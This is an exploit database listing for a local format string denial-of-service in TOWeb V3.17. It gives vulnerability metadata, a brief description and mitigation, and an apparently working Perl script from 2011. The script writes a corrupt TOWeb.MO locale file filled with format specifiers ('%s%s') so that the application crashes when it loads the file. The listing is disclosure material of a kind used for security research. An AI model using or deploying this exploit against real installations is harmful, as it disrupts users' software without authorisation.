TOWeb V3 Local Format String DOS Exploit (TOWeb.MO file corruption)

vendor:

TOWeb V3

by:

BSOD Digital (Fabien DROMAS)

7.5

CVSS

HIGH

Local Format String DOS

CWE

Product Name: TOWeb V3

Affected Version From: TOWeb V3.17

Affected Version To: TOWeb V3.17

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7

2011

TOWeb V3 Local Format String DOS Exploit (TOWeb.MO file corruption)

This exploit allows an attacker to create a corrupt TOWeb.MO file which can lead to a local format string denial of service (DOS) vulnerability. By providing a specially crafted input, the attacker can cause the TOWeb application to crash or become unresponsive.

Mitigation:

The vendor should release a patch or update to fix the vulnerability. Users should update their TOWeb application to the latest version to mitigate the risk.

Source

Exploit-DB raw data:

#
#Exploit Title:
#TOWeb V3 Local Format String DOS Exploit (TOWeb.MO file corruption)
#
#Date: 05/09/2011
#
#Author: BSOD Digital (Fabien DROMAS)
#Mail: bsoddigital@gmail.com
#
#
#Test:
#OS: Windows 7
#Versions: V3.17
#
#Path:
#Lauyan\TOWeb V3\locale\fr\LC_MESSAGES\TOWeb.MO
#
#Link:
#http://www.lauyan.com/download/old/install-towebv3-fr.exe
#
#!/usr/bin/perl

print "\n------------------------------------";
print "\nLauyan TOWeb v3 Local Format String Dos Exploit";
print "\nBSOD Digital - bsoddigital@gmail.com";
print "\n------------------------------------";
my $file = "TOWeb.MO";
my $corrupt = "%s" x 2;
open($File, ">$file");
print $File $corrupt;
print "\nEvil TOWeb.MO file created.";
close($File);